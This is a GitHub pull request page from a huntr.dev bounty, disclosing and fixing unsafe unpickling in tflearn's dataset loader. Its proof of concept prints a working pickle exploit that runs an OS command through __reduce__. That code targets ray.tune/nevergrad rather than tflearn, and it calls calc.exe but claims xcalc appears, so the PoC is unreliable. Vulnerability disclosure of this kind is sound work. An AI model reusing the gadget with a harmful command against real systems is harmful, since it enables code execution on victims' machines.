Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Security Fix for Arbitrary Code Execution - huntr.dev #1163

Open
wants to merge 4 commits into
base: master
Choose a base branch
from

Conversation

huntr-helper
Copy link

https://huntr.dev/users/Anon-Artist has fixed the Arbitrary Code Execution vulnerability 🔨. Think you could fix a vulnerability like this?

Get involved at https://huntr.dev/

Q | A
Version Affected | ALL
Bug Fix | YES
Original Pull Request | 418sec#1
Vulnerability README | https://github.com/418sec/huntr/blob/master/bounties/pip/tflearn/1/README.md

User Comments:

📊 Metadata *

TFlearn is a modular and transparent deep learning library built on top of Tensorflow. It was designed to provide a higher-level API to TensorFlow in order to facilitate and speed-up experimentations, while remaining fully transparent and compatible with it. This package was vulnerable to Arbitrary Code Execution.

Bounty URL: https://www.huntr.dev/bounties/1-pip-tflearn

⚙️ Description *

load_batch() function is used to load CIFAR 10 dataset for training. Lack of restriction in input allowes attacker-crafted file to get unpickled which causes code execution.

💻 Technical Description *

Fixed by avoiding unsafe loader.

🐛 Proof of Concept (PoC) *

Create the following PoC file:
exploit.py

import pickle
import os
import nevergrad
from ray.tune.suggest.nevergrad import NevergradSearch

class EvilPickle(object):
    def __reduce__(self):
        return (os.system, ('calc.exe', ))

payload = pickle.dumps(EvilPickle())
optimizer = nevergrad.optimization.Optimizer(1)
ngSearch = NevergradSearch(optimizer)

with open('payload', 'wb') as f:
    f.write(payload)

ngSearch.restore('payload')

Execute the following commands in another terminal:

python3 exploit.py
Check the Output:

xcalc will pop up.

🔥 Proof of Fix (PoF) *

After fix it will not popup a calc.

👍 User Acceptance Testing (UAT)

After fix functionality is unaffected.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

3 participants